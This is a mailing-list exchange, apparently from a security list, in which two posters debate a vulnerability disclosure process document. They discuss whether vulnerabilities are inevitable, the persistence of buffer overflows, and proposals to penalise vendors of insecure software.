>"The Vendor MUST provide a facility for individuals or
> organizations who are not Customers to report vulnerabilities"
>
>This to me sounds like it is acceptable that there are going to be
>vulnerabilities. Continue cranking out shodware because we have a set
>of guidelines that people who stumble across them are expected to
>adhere to.

Vulnerabilities will happen, even in the best of circumstances, as
long as new types of vulnerabilities are discovered. If there are 20
individuals who decide to audit a package for a new type of
vulnerability, but the vendor only has 5 developers, then it seems
like there's a good chance that someone other than the vendor will
discover the issue. Then you've got "interaction" vulnerabilities,
which I loosely define as when a vulnerability occurs in the way that
two products interact with each other. Developers can't always
predict how their product will be used, or how it will interact with
other products, so interaction-based vulnerabilities may be around in
one form or another.

Given the likelihood of vulnerabilities in a "perfect" world, it seems
reasonable that the vendor should be prepared to respond to incoming
reports.

>Why not draft a guideline for release of software onto
>internet. Security guideline (defaults of configs. etc.) and Quality
>Guidelines (vendor (a) is a known creator of crudware etc.). if you
>want to connect to the interne or peddle your internet connect warest,
>you the vendor must follow these guidlines. Penalise them them if they
>fail. Fine them real money if the repeat.

This is a very interesting proposal if I understand what you're
saying, but it's outside the scope of a disclosure process document.

I can't think of any document that specific says "use
secure-by-default" (and defines what that means), "avoid buffer
overflows," "conduct third-party evaluation of product design," "make
security-based patching and configuration easy" (and try to define
*that* :-), etc. Such a document might be useful for less-technical
customers to ask their vendors to make more secure products. I
suspect that many customers want security, but they don't know how to
ask for it.

- Steve
Re: Re: it\'s all about timing [ In reply to ]
[SNIP]

> >Your number 6 below:
> >
> >"The Vendor MUST provide a facility for individuals or
> > organizations who are not Customers to report vulnerabilities"
> >
> >This to me sounds like it is acceptable that there are going to be
> >vulnerabilities. Continue cranking out shodware because we have a set
> >of guidelines that people who stumble across them are expected to
> >adhere to.
>
> Vulnerabilities will happen, even in the best of circumstances, as
> long as new types of vulnerabilities are discovered. If there are 20
> individuals who decide to audit a package for a new type of
> vulnerability, but the vendor only has 5 developers, then it seems
> like there's a good chance that someone other than the vendor will
> discover the issue. Then you've got "interaction" vulnerabilities,
> which I loosely define as when a vulnerability occurs in the way that
> two products interact with each other. Developers can't always
> predict how their product will be used, or how it will interact with
> other products, so interaction-based vulnerabilities may be around in
> one form or another.


But seriously, what's new about buffer overflows, which are the main cause
of vunls in software now as they were in the 1980's and prior when the
morris worm hit[1]. How about repeat issue with the same products, like
the M$ sql server issues <not that M$ is the only vendor with products
that sink time and again>?


What 'new types of vulnerabilities' are being discovered?


[SNIP]


Thanks,

Ron DuFresne
[1] http://sysinfo.com/iworms.html (our shameless plug)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.